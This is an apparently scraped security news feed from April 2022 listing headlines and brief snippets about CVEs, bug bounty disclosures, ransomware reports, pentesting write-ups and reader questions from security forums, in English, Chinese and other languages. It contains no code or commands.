    Encrypting our way to SSRF in VMWare Workspace One UEM/Airwatch (CVE-2021-22054)
    submitted by /u/FireFart [link] [comments]
    Kubernetes Security Series - https://smart7.in/2022/03/30/Kubernetes-Cluster-Attack-Defense-Importance-of-Network-Policies.html
    submitted by /u/agrawal7 [link] [comments]
    Package Planting: Are You [Unknowingly] Maintaining Poisoned Packages?
    submitted by /u/mkatch [link] [comments]
    CVE-2021-22204 : Exploiting remote code execution within VirusTotal platform in order to gain access to its various scans capabilities
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Weird PDF to my gmail account that I accidentally opened in gmail
    Hi everyone, did a bit of a stupid thing recently. Got this email by an address with a perfectly normal name and there was a pdf attached to it. I didn't really think much about it (because I get these regularly for university) and klicked the attachment so that it opened in that weird gmail viewer. I didn't download it, just clicked the attachment. I didn't actually know the email address, just clicked without thinking. Then I realized that the body of the email was just gibberish letters and numbers with spaces arbitrarily between, something like "ashene qlossa 90442 12394" and so on (would prefer not to copy paste the entire thing here in case it's something actually meaningful to someone). Obviously not legitimate. The attachment itself started as this sex website advertisement thing, but the further you went down, it was just weird numbers and lines in different colors. When I saw that, I closed the attachment immediately. I realized that the .pdf had a link attached over the entire thing (all of the pdf was attached to a different website essentially), but I didn't click, just had the attachment open for 2-3 seconds tops. So my question is... could anything bad have happened while I had the pdf open in the gmail viewer? Full Windows defender scan didn't show anything afterwards and the pdf is safe according to virustotal, which just confused me more because obviously the pdf has to be unsafe in some way, right? Sorry for the rambling post, I'm just a bit unsure about what exactly this is. Would appreciate any help. submitted by /u/Pronounta [link] [comments]
    Compromised Internet Routed (need advice)
    is it possible that someone that had access to my router, installed a firewall program and is restricting my access to certain sites? i ask because i am able to access said site on my mobile device on my mobile data, and when i use a mobile data hot spot on my PC, however when i connect to my WiFi i can't gain access to said site on my PC or my mobile. any advice on how to detect such a thing or to prevent such a thing from occurring again would be greatly appreciated. submitted by /u/Severe_Document2108 [link] [comments]
    Password Manager with Blind Autofill?
    Looking for a psw manager that can fill fields without displaying the information. I.e. a saved credit card can be used to make purchases by a registered low permissions user without being displayed in manager / in browser after filled. Please let me know if you know any solution that fits the bill thx. submitted by /u/polloloco067 [link] [comments]
    Where do you store shared QR Codes?
    Looking for any solutions anyone has for storing shared QR codes. For example, one that might be needed for an Authenticator rotating one-time-password app that a team of people share. The ideal solution would be the same place a shared password is kept for one-stop shopping for these types of secrets. submitted by /u/Johnny_BigHacker [link] [comments]
    Seeking Advice: moving from productivity based in a security firm to high level individual contributor and primary security expertise -- how to quickly adapt?
    Salutations! I believe this may be the right place to ask so here goes: Background: I worked my way up from help desk into security, and now I'm professional level (5+ years). My previous positions have all been with technically gifted security firms where there were several layers of professionals and safety nets above me and below me; both in terms of expertise and relationships. Being around fellow security specialists day in and day out is a privilege I didn't previously realize. Situation: I currently am a new hire to a company whose maturity model is still being developed and I am now one of the few primary security disciplines on staff and work with a cross functional team who are all people leaders. This is intimidating and somewhat stressful, I know deep down I am capable to…
    Sysmon for SME <50 employees?
    I'm a IT jack-of-all-trades / master-of-none for a small business with about 40 users give or take. I'm also thinking of persuing a career in Netsec seeing as I basically have my own environment to play with... I've taken great strides in Netsec and going to be sitting my CISSP soon. Have implemented endpoint security, tidied up AD (particularly admin) accounts, set up 3-2-1 backups, etc etc Anyway my question is on the SIEM side. Being a small business I've found SIEMs a) very expensive and b) hard to get my head around. One suggestion I've seen a few times is enabling sysmon and using some kind of opensource product to monitor - GRR? SNORT? - Is sysmon going to eat up resources (per device?) - Being a newbie/scrub, will I get meaningful info? Is this worth persuing? Is this a must? I do have time and energy to invest in this. Appreciate any responses and hopefully not too much scoffing at my noobness! submitted by /u/saladnicoise [link] [comments]
    Search engine pre-registration (criminal ip ????)
    I'm currently a student studying vulnerability and security. I mainly use OSINT and search engine to study security. I know that there are many products for the search engine, such as Censys and shodan. I used Shodan for a certain period of time, but first of all, I felt that the performance was good. But as a student, there is a burden in terms of price. So I once shared a list of search engines that people use in the OSINT community, and there was a search engine called Criminalip. It's a search engine similar to Shodan, and the functions are very similar. But as I'm just starting to study security, I still don't know which search engines are highly utilized. So I'm trying to use this and that. This time, that criminal ip has registered for the beta test, and I registered in advance and got a free pass for 6 months. If there are students who have a price burden to use Shodan, I think you can refer to it. Below is the list of search engines that I shared before and the clinical ip url that I applied for the beta test. Oh! And since it's sharing for studying, I hope you don't think it's a promotion or an advertisement! ​ ​ https://criminalip.io ​ https://www.reddit.com/r/OSINT/comments/u0yv15/search_engines_for_people_doing_osint/?utm_source=share&utm_medium=web2x&context=3 submitted by /u/Alexiosplana [link] [comments]
  • Open

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116.html Comments URL: https://news.ycombinator.com/item?id=31184926 Points: 5 # Comments: 0
    VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus
    Article URL: https://portswigger.net/daily-swig/virustotal-debunks-claims-of-a-serious-vulnerability-in-google-owned-antivirus-service Comments URL: https://news.ycombinator.com/item?id=31182396 Points: 2 # Comments: 1
    Commit Level Vulnerability Dataset (For Android)
    Article URL: https://blog.quarkslab.com/commit-level-vulnerability-dataset.html Comments URL: https://news.ycombinator.com/item?id=31180203 Points: 1 # Comments: 1
    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    Article URL: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ Comments URL: https://news.ycombinator.com/item?id=31179270 Points: 15 # Comments: 1
  • Open

    NASA FTP with data organized by mission, and some file conversion software too
    The Space Physics Data Facility (SPDF) hosts the NASA non-solar heliophysics archive of current and past heliophysics missions and related ground-based and non-NASA data. https://spdf.gsfc.nasa.gov/pub/ submitted by /u/osendai [link] [comments]
    dorky band photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of antiques
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Many, many pictures of clothes and accessories on display.
    submitted by /u/HGMIV926 [link] [comments]
  • Open

    Passive Reconnaissance Using Only Kali Terminal | Infosec |
    Disclaimer: This blog is only for educational purpose. Continue reading on System Weakness »
    Passive Reconnaissance Using Only Kali Terminal | Infosec |
    Disclaimer: This blog is only for educational purpose. Continue reading on Medium »
    You need to hear this if you are new/want to start bug hunting
    Hello everyone, Continue reading on Medium »
    Bypassing WAF for $2222
    I know it’s been a very long time since I last published my article on how I was able to find RCE on Bentley systems. For the last 1–1.5… Continue reading on Medium »
    AD Pentesting Notes
    If you just have access to an AD environment but you don’t have any credentials/sessions you could: Pentest the network: Scan the network… Continue reading on Medium »
    4EVERLAND chính thức khởi động “First Leap Program” với giải thưởng lên đến 15 triệu 4EVER
    Kính chào toàn thể người dùng, Continue reading on Medium »
  • Open

    War in Ukraine / April 26
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    What are red-blue teams in hacking?
    A red team is an offensive security professional with expertise in breaking into defenses and attacking systems. A blue team, on the other… Continue reading on Medium »
    What are the types of white box testing?
    White box testing happens to be a form of software testing, which assesses the internal working structure of an application. It also… Continue reading on Medium »
    AD Pentesting Notes
    If you just have access to an AD environment but you don’t have any credentials/sessions you could: Pentest the network: Scan the network… Continue reading on Medium »
  • Open

    FreeBuf早报 | 英国陆军征兵网站因数据泄露下线月余;纽约或将加密欺诈纳入刑法
    谷歌4月27日起在安卓(Android)官方应用商店Google Play推出应用隐私政策,安卓用户将能查看APP收集的隐私数据(及其目的和用途)。
    实锤!可口可乐证实受到网络攻击并开展调查
    全球最大软饮制造商可口可乐公司在近日发布的一份声明中证实,公司相关网络受到了攻击,目前已对攻击行为开展调查。
    安卓木马VajraSpy伪装成聊天软件,瞄准巴基斯坦军方
    研究人员发现,APT-Q-43 组织使用 VajraSpy 木马伪装成名为 Crazy Talk 的聊天应用程序,攻击巴基斯坦军方人员。
    宁波通商银行股份有限公司招聘安全管理岗
    宁波通商银行股份有限公司招聘2名安全管理岗。
    软件成分安全分析(SCA)能力的建设与演进
    本文主要介绍 SCA 能力在企业内部实际落地的过程、遇到的问题以及对 SCA 技术的看法和展望。
    黑客利用关键的VMware RCE漏洞安装后门
    高级黑客正在积极利用影响VMware Workspace ONE Access的关键远程代码执行(RCE)漏洞CVE-2022-22954。
    《中国「网安宇宙」高效运营从安全服务到MSS 》报告正式发布
    为深入了解网络安全托管服务MSS对中国网络安全建设的战略意义,FreeBuf咨询结合定量与定性等分析方法展开深入研究。
    Black Basta勒索软件攻击美国牙科协会
    美国牙科协会遭到了网络攻击。目前,该协会正在积极调查攻击事件,同时关闭了部分网络系统。
    网络安全纳入央企负责人经营业绩考核
    《办法》将网络安全纳入考核范围,并视情节给予负责人相应的处分,进一步提高央企防范重大网络安全事件的能力和水平。
    Dirty Pipe 漏洞报告全文翻译
    根据dirty pipe漏洞英文文章进行了下翻译,文中有内存位置由于涉及敏感字符,进行了修改。
    Log4Shell 过气了?攻击面仍大量存在
    研究显示,Log4Shell漏洞的修补情况不容乐观,仍有大量企业组织在使用过时或易受攻击的版本。
    「网安新势力」的Call in,快接!
    「网安新势力Solo发布季」请你来玩了~
  • Open

    SecWiki News 2022-04-27 Review
    CodeQL进阶知识(Java) by ourren 从源代码的控制流图中学习特性以定位缺陷 by ourren A blueprint for evading industry leading endpoint protection in 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-27 Review
    CodeQL进阶知识(Java) by ourren 从源代码的控制流图中学习特性以定位缺陷 by ourren A blueprint for evading industry leading endpoint protection in 2022 by ourren 更多最新文章,请访问SecWiki
  • Open

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize
  • Open

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize
  • Open

    Container escape on public GitLab CI runners
    GitLab disclosed a bug submitted by ec0: https://hackerone.com/reports/1442118
    CVE-2022-27776: Auth/cookie leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1547048
    CVE-2022-27775: Bad local IPv6 connection reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1546268
    CVE-2022-27774: Credential leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1543773
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview
  • Open

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview

  • Open

    What is the one thing ( or skill ) that you should focus on in exploit dev?
    submitted by /u/morizk90 [link] [comments]
    developing a remote exploit for a stack overflow in Linux CVE-2022-0435, not including KASLR
    submitted by /u/ozxsl2w3kejkhwakl [link] [comments]
  • Open

    Inszene der Heimatschutzbehörde enthüllt eine große Anzahl von Mängel
    Continue reading on Medium »
    Untitled
    Self XSS Continue reading on Medium »
    My Pentest Log -16- (XS Size A Little Tip)
    Greetings to all from a springtime Constantinople, Continue reading on Medium »
  • Open

    KrbRelayUp - local privilege escalation in Windows domain environments where LDAP signing is not enforced
    submitted by /u/0xdea [link] [comments]
    Introduction to VirtualBox security research and fuzzing
    submitted by /u/nibblesec [link] [comments]
    Thinkstscapes Q1 2022 research round-up
    submitted by /u/ranok [link] [comments]
    New CloudGoat scenario: Vulnerable-by-Design Lambda functions
    submitted by /u/hackers_and_builders [link] [comments]
  • Open

    Vulnerability Roundup – April 2022
    Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. Remote Code Execution (RCE) Elementor WordPress Plugin Installations: 5,000,000+ Patched Version: 3.6.3 Vulnerability: Remote code execution (RCE) Severity: Critical CVE: CVE-2022-1329 This critical vulnerability leverages a lack of capability checks found in vulnerable versions of the Elementor plugin. Continue reading Vulnerability Roundup – April 2022 at Sucuri Blog.
  • Open

    SQL Injection on https://soa-accp.glbx.tva.gov/ via "/api/" path - VI-21-015
    Tennessee Valley Authority disclosed a bug submitted by yassinek3ch: https://hackerone.com/reports/1125752
    Stored XSS in "product type" field executed via product filters
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1404770 - Bounty: $500
    RCE via exposed JMX server on jabber.37signals.com/jabber.basecamp.com
    Basecamp disclosed a bug submitted by ian: https://hackerone.com/reports/1456063 - Bounty: $100
  • Open

    Windows Indexing Locations
    Hi all, I’m trying to see if a Windows 10 Pro computer was set up so that when a USB drive was connected, it would index the files/folders on the drive. Does anyone know where this information is stored? Im thinking it’s a registry key but I’m not finding too much info online about it. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
  • Open

    OSINT of website…
    Let’s look at the topic of information sources for OSINT research of websites today. I’ll be interested to learn about the personalities… Continue reading on Medium »
    War in Ukraine / April 25
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Will Elon Musk Revolutionize The World of OSINT and Campaigns?
    Elon Musk’s effort to acquire Twitter passed an important milestone yesterday when Twitter’s Board of Directors recommended to accept his… Continue reading on Medium »
  • Open

    Finding IP addresses in a Network
    When you land on a huge big network with several VLAN’s and are unsure of where to look or start! Continue reading on Medium »
    TryHackme — Alfred(Exploit Jenkins Service Gain To Authority/System)
    Hi semua pada artikel ini saya akan membagikan write up mechine tryhackme yang bername alfred mechine ini berfokus pada teknologi jenkins… Continue reading on Medium »
    gcpHound v2.0 : Django Web UI To Analyze IAM Permissions
    In this article, we will talk about recent functionalities added to the gcpHound as well as how to use them. Continue reading on Medium »
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-04-26 Review
    《软件分析》课程实验作业平台概述 by ourren xray联动crawlergo自动化扫描爬坑记 by sinver 利用远程进程分叉转存Lsass凭据 by sinver 记一次护网漏洞发现到域控全过程 by sinver 记一次Discuz X3.4后台getshell by sinver 无需免杀获取域控hash小技巧 by sinver 利用ProxyShell漏洞获取域控所有Hash by sinver 红队必备技能之隐蔽的技巧 by sinver 针对移动支付的道德反欺诈系统 by ourren Pentest_Note: 渗透测试常规操作记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-26 Review
    《软件分析》课程实验作业平台概述 by ourren xray联动crawlergo自动化扫描爬坑记 by sinver 利用远程进程分叉转存Lsass凭据 by sinver 记一次护网漏洞发现到域控全过程 by sinver 记一次Discuz X3.4后台getshell by sinver 无需免杀获取域控hash小技巧 by sinver 利用ProxyShell漏洞获取域控所有Hash by sinver 红队必备技能之隐蔽的技巧 by sinver 针对移动支付的道德反欺诈系统 by ourren Pentest_Note: 渗透测试常规操作记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    Overwhelmed by vulnerabilities? Here’s the best way to prioritize them.
    We know that software vulnerabilities remain one of the primary causes of external attacks. We also know that on average, vulnerabilities are exploited for the first time just days after they’re disclosed. You may be managing many third-party applications, so how can you make sure you can drive remediation and reduce the risk for all your software? Once vulnerabilities are discovered, how will you know which ones should be prioritized? A common misconception is that every vulnerability in your organization should be addressed immediately, but keeping up with vulnerability disclosures that affect your environment is a constant, ongoing challenge. It…
  • Open

    Go에서 Stdin에 대한 테스트 코드 작성하기
    테스트 코드 작성 중 우리가 예측 가능한 함수 인자 값은 쉽게 체크가 가능하지만, 시스템으로 부터 넘어오는 데이터는 막상 작성하려고 하면 어떻게 해야할지 고민이 되기 시작합니다. 오늘은 그 중 하나인 Stdin에 대한 테스트 코드 작성 이야기를 하려고 합니다. Pipe trick Stdin은 테스트 코드상에서 os.Pipe()와 간단한 트릭을 사용해 통제할 수 있습니다. os.Pipe() 먼저 os.Pipe() 는 아래와 같은 리턴을 가집니다. 그리고 설명을 읽어보면 첫번째 리턴인 r과 두번째 리턴인 w가 서로 연결된 File 오브젝트라고 합니다.
  • Open

    CVE-2022-24706: Apache CouchDB Remote Privilege Escalation
    Article URL: https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 Comments URL: https://news.ycombinator.com/item?id=31167557 Points: 2 # Comments: 1
  • Open

    Defending the Gates of Microsoft Azure With MFA
    Since Russia’s invasion of Ukraine, companies based in the United States have been on alert for potential cyberattacks on IT infrastructure. Multi-Factor Authentication (MFA) has been one of the most recommended settings for organizations to turn on. Recently, the White House issued a FACT SHEET on how organizations can protect themselves against potential cyberattacks from... The post Defending the Gates of Microsoft Azure With MFA appeared first on TrustedSec.
  • Open

    Java代码审计一危险函数分析与利用(二)
    从这段时间开始我将继续开始分享我在学习代码审计时的遇到的问题以及我个人在学习时的感悟。
    专访F5陈亮:数字化浪潮下的应用与安全
    如何有有效减轻应用激增的压力,缓解企业网络安全风险,让企业的数字化转型安然进行,是企业需要解决的问题。
    FreeBuf早报 | 伊朗黑客利用RCE漏洞部署后门;BotenaGo变种针对Lilin摄像头
    网络攻击者Rocket Kitten正在积极利用VMware漏洞,以此获得初始访问权限,并在系统上部署Core Impact渗透测试工具。
    斗象攻防演练宝典系列之神剑出鞘
    2022年大型攻防演练即将来临,你准备好了吗?
    赠书福利 | 企业数据安全建设,这本书不可或缺!
    《数据安全实践指南》对数据安全全生命周期的过程域逐一进行解读并提供实践操作建议。
    伊朗宣布挫败针对公共服务的大规模网络攻击
    近日,伊朗国家电视台宣布挫败了若干起大规模网络攻击,其攻击的目标是政府和私人组织运营的公共服务。
    CISA在漏洞利用列表中增加了7个新漏洞
    CISA在其积极漏洞利用的安全问题列表中新添加了7个漏洞
    病毒利用驱动人生升级通道及高危漏洞传播 12月14日半天感染数万台电脑
    12月14日,病毒利用驱动人生升级通道及高危漏洞传播 12月14日半天感染数万台电脑
    谷歌修复了VirusTotal平台的高危RCE漏洞
    VirusTotal 平台出现安全漏洞,攻击者可能利用该漏洞实现远程代码执行。
    美指控朝鲜APT利用新型恶意软件攻击记者
    当地时间4月25日,美国新闻网站NK News称,其发现朝鲜支持的APT37正利用一种新型恶意软件样本攻击在朝记者。
    俄乌争端致使 DDoS 攻击达到历史最高水平
    与 2021 年第四季度相比,2022 年第一季度的DDoS)攻击增加了 46%,大部分攻击被用于针对俄罗斯。
  • Open

    File Formats
    Having an understanding of file formats is an important factor in DFIR work. In particular, analysts should understand what a proper file using a particular format should look like, so that they can see when something is amiss, or when the file itself has been manipulated in some manner. Understanding file formats  goes well beyond understanding PE file formats and malware RE. Very often, various Microsoft file formats include data, or metadata (defined as "data about data") that can be mined/parsed, and then leveraged to tremendous effect, furthering overall analysis and intelligence development, often across multiple cases and campaigns. LNK Windows shortcut, or LNK files, have been covered extensively in this blog, as well as other blogs, in addition to having been well documented by MS…

  • Open

    Trying to carve Office documents but they always open corrupted, Help pls
    submitted by /u/KTthemajicgoat [link] [comments]
    Quantum ransomware analysis
    New week, new report! This time me, 0xtornado and svch0st collaborated on a #QuantumRansomware compromise. ➡️ ISO file ➡️ PsExec ➡️ *attacker hostname* TERZITERZI ➡️ much more! https://thedfirreport.com/2022/04/25/quantum-ransomware/ submitted by /u/samaritan_o [link] [comments]
    Extract Bitlocker Clear Key?
    Hi, i got 2 Bitlocker encrypted drives on whom Bitlocker itselves is disabled so that there must be a Clear Key stored on the drive. I can access the Data with Magnet Axiom, witch autodiscovered the Key, but I want to run some other examinations with other tools on it. So my question is does anybody know where exactly the Clear Key is stored? Thanks for any help submitted by /u/kaibring [link] [comments]
  • Open

    Local file disclosure through SSRF at next.nutanix.com
    Nutanix disclosed a bug submitted by tosun: https://hackerone.com/reports/471520
    Force User to Accept Attacker's invite [ Restrict user to create account]
    Krisp disclosed a bug submitted by sammam: https://hackerone.com/reports/1420070 - Bounty: $100
    Visibility Robots.txt file
    Krisp disclosed a bug submitted by razahack: https://hackerone.com/reports/1450014
    Xss triggered in Your-store.myshopify.com/myshopify.com/admin/apps/shopify-email/editor/****
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1472471 - Bounty: $2900
    CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 comparison disaster
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549435
    CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 bypass if string not 32 chars
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1549461
  • Open

    ClusterFuzz is a scalable fuzzing infrastructure
    Article URL: https://github.com/google/clusterfuzz Comments URL: https://news.ycombinator.com/item?id=31160965 Points: 2 # Comments: 0
  • Open

    What you doing wrong when you fail at bug bounties?
    Hi all, I hope all is well. I have 3+ years bug bounty experience so I want to talk about the common mistakes when doing bug bounty… Continue reading on Medium »
    Open-Redirects
    Most of time you have seen that when you go to a website and try to access some page which require a user to login first, it redirects you… Continue reading on Medium »
    The time I hacked a Fortune 500 company, but it was out of scope.
    Hi :) thanks for taking some time to read my blog post. This is a short post about a bug I found during my testing of a Fortune 500… Continue reading on Medium »
    Improper cookie not expiring after logged out!
    hey folks! Im Mujibur Rahman from chennai and I’m a security researcher Continue reading on Medium »
    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
    Unlock any blur text/picture without membership/subscription on Scribd.com |By Neuchi
    hi, im Neil Harvey Miñano  5 days ago i found a vulnerability on scribd.com when i finding an dork for google sqli Continue reading on System Weakness »
  • Open

    HOW TO ENCRYPT FILE SYSTEM IN RHEL 8
    Hi, I seek your counsel on a way to encrypt a file system partition (i.e /encrypted_data) containing sensitive data file .txt with RBAC on top to allow only application users to access those files, admin access should be restricted with the objective to comply with PCI-DSS. steps are available for that on AIX using efskeymgr however I'm looking for similar steps for Linux. http://www.asgaur.com/wp/how-to-encrypt-file-system-in-aix/ ​ thank you, submitted by /u/Sparthans [link] [comments]
    Looking for resources on industry best practices
    I'm looking for resources for learning about Industry best practices for correcting/dealing with typical vulnerability classes. Blogs, whitepapers, YouTube channels, whatever you find helpful would be much appreciated. This came up as recommended knowledge for an interview for a Product Security Engineer position. This would be primarily dealing with web apps but I'm open for infrastructure security as well. Thanks in advance!!! submitted by /u/rbl00 [link] [comments]
    Help understanding facebook account hijacking?
    I am not looking for advice just information. Obviously there are multiple motives for hijacking a Facebook. Specifically I am curious as it's use for anonymity. I imagine it could be used in a similar way as someone might use someone's offline identity and or credit cards to cover their tracks. My friends account got hijacked by a random and it appears to be being used for foreign political propaganda. Is it easier to highjack an account than make an anonymous one? At least one that would be difficult for local law enforcement or something to trace? Would it circumvent something, make them harder to find? What would be or likely be the benefits/motive for doing it this way? I feel like there's more to this than that I'm not seeing and I'm curious. submitted by /u/fright_end [link] [comments]
  • Open

    Static unpacker and decoder for Hello Kitty Packer
    submitted by /u/GelosSnake [link] [comments]
  • Open

    War in Ukraine / April 24
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Incognito 3.0 OSINT Writeups
    1. ICTF Continue reading on Medium »
  • Open

    SecWiki News 2022-04-25 Review
    SecWiki周刊(第425期) by ourren 软件成分安全分析(SCA)能力的建设与演进 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-25 Review
    SecWiki周刊(第425期) by ourren 软件成分安全分析(SCA)能力的建设与演进 by ourren 更多最新文章,请访问SecWiki
  • Open

    Facebook’s big vulnerability
    Article URL: https://thebucketreport.com/video/facebooks-big-vulnerability Comments URL: https://news.ycombinator.com/item?id=31155935 Points: 35 # Comments: 79
    Vulnerability of avian populations to renewable energy production
    Article URL: https://royalsocietypublishing.org/doi/10.1098/rsos.211558 Comments URL: https://news.ycombinator.com/item?id=31155272 Points: 1 # Comments: 0
  • Open

    Dreaming While Awake
    Interview with Professional Social Engineer — Jenny Radcliffe! Continue reading on ILLUMINATION »
  • Open

    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
  • Open

    fuzzing and credentials leakage..nice bug hunting writeup
    Here you find a beautiful write-up with useful tips :) Continue reading on Medium »
  • Open

    Defeating BazarLoader Anti-Analysis Techniques
    Anti-analysis techniques make it harder for malware analysts to do their work. We cover BazarLoader anti-analysis techniques and how to defeat them. The post Defeating BazarLoader Anti-Analysis Techniques appeared first on Unit42.
  • Open

    中央网信办等三部门印发《深入推进IPv6规模部署和应用2022年工作安排》
    到2022年末,物联网IPv6连接数达到1.8亿,固定网络IPv6流量占比达到13%,移动网络IPv6流量占比达到45%。
    谷歌Project Zero报告披露2021年0-day漏洞利用全球趋势
    2021年内,谷歌共检测并披露了58个在野外的0-day漏洞,这一数字创下了项目2014年成立以来的新纪录。
    借由Hack DHS计划,美国国土安全部系统发现了122个安全漏洞
    加入“Hack DHS”漏洞赏金项目(bug bounty program)的赏金猎人已经在国土安全部的外部系统中发现了122个安全漏洞。
    2021年网络与数据安全法规、政策、国标、报告大合集
    本文就我国2021年安全相关政策法规和产业报告进行全面整理,供产业人士参考。
    FreeBuf早报 | 匿名者累计泄露俄罗斯5.8TB数据;安全漏洞创纪录增长
    自从对俄罗斯宣布网络战争以来,匿名者现在已经公布了大约 5.8TB 的俄罗斯数据。
    从欧洲“超算”被黑事件,重新审视和思考威胁情报的价值
    <section>不久前,欧洲多国超级计算机上演“挖矿”风暴,规模之大史无前例。</section><section><br data-mce-bogus="1"></section><section
    Atlassian解决了一个关键的Jira身份验证绕过漏洞
    威胁参与者可以通过向易受攻击的软件发送特制的HTTP 请求来触发漏洞。
    Java加密漏洞PoC代码公开,受影响的版本需尽快升级
    该漏洞已经修复,但由于Poc代码的公开,受影响的版本需尽快修复以防被利用。
    对俄罗斯宣战以来,匿名者累计泄露5.8TB数据
    匿名者宣布对俄罗斯发动网络战争以来,已 公布了约 5.8 TB 的俄罗斯数据。
    哥斯达黎加国家财政系统遭勒索攻击:税务海关停摆
    北美洲国家哥斯达黎加遭到Conti勒索软件攻击,多个部委大量系统受影响瘫痪,大量敏感数据被盗。
    OSSIM平台网络日志关联分析实战
    本文简要介绍了OSSIM平台下的网络日志关联分析技术,希望能给大家提供一些帮助。
  • Open

    Beginners Guide to 0day/CVE AppSec Research
    Article URL: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html Comments URL: https://news.ycombinator.com/item?id=31152385 Points: 2 # Comments: 0
  • Open

    Bypass the Docker Firewall by Abusing REST API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Tons of gifs and jpegs of Tolkien from Silmarillion and Lord of the Rings
    submitted by /u/FireHole [link] [comments]
  • Open

    [译] BPF ring buffer:使用场景、核心设计及程序示例(2020)
    译者序 本文翻译自 BPF 核心开发者 Andrii Nakryiko 2020 的一篇文章:BPF ring buffer。 文章介绍了 BPF ring buffer 解决的问题及背后的设计,并给出了一些代码示例和内核 patch 链接,深度和广度兼备,是学习 ring buffer 的极佳参考。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 ringbuf 相比 perfbuf 的改进 1.1 降低内存开销(memory overhead) 1.2 保证事件顺序(event ordering) 1.3 减少数据复制(wasted data copy) 2 ringbuf 使用场景和性能 2.1 常规场景 2.2 高吞吐场景 2.3 不可掩码中断(non-maskable interrupt)场景 2.4 小结 3 示例程序(show me the code) 3.1 perfbuf 示例 内核 BPF 程序 用户空间程序 3.2 ringbuf 示例 内核 BPF 程序 用户空间程序 3.3 ringbuf reserve/commit API 示例 原理 限制 内核 BPF 程序 用户空间程序 4 ringbuf 事件通知控制 4.1 事件通知开销 4.2 perbuf 解决方式 4.3 ringbuf 解决方式 5 总结 很多场景下,BPF 程序都需要将数据发送到用户空间(userspace), BPF perf buffer(perfbuf)是目前这一过程的事实标准,但它存在一些问题,例如 浪费内存(因为其 per-CPU 设计)、事件顺序无法保证等。 作为改进,内核 5.8 引入另一个新的 BPF 数据结构:BPF ring buf…

  • Open

    Hosting for video game servers?
    http://zsr.site.nfoservers.com/ submitted by /u/n0stal6ic [link] [comments]
  • Open

    Red Team operasyonlarında Windows Defender’ı Bypass etme yöntemleri
    Merhaba. Bu içerikte Windows Defender’dan nasıl kurtulabileceği hakkında bazı komut satırlarına değiniyor olacağız. Let’s go. Continue reading on Medium »
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    Secret from HackTheBox — Detailed Walkthrough
    No content preview
    THM: Raz0rBlack
    No content preview
    How to perform a basic SQL Injection Attack? — Ethical Hacking
    No content preview
  • Open

    --libcurl code injection via trigraphs
